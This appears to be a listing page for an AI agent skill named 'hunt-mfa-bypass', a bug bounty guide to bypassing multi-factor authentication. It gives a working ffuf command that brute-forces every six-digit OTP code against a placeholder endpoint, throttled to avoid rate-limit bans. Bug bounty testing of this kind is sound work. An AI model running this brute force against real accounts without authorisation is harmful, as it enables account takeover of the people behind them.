hunt-mfa-bypass

Installation

SKILL.md

19. MFA / 2FA BYPASS

Growing bug class — 7 distinct patterns. Pays High/Critical when it enables ATO without prior session.

Pattern 1: No Rate Limit on OTP

# Test with ffuf — all 1M 6-digit codes
ffuf -u "https://target.com/api/verify-otp" \
  -X POST -H "Content-Type: application/json" \
  -H "Cookie: session=YOUR_SESSION" \
  -d '{"otp":"FUZZ"}' \
  -w <(seq -w 000000 999999) \
  -fc 400,429 -t 5
# -t 5 (slow down) — aggressive rates get 429 or ban

Installs

Repository

elementalsouls/…ughunter

GitHub Stars

2.6K

First Seen

May 24, 2026

Security Audits

Gen Agent Trust HubPass

SocketWarn

SnykFail

hunt-mfa-bypass — elementalsouls/claude-bughunter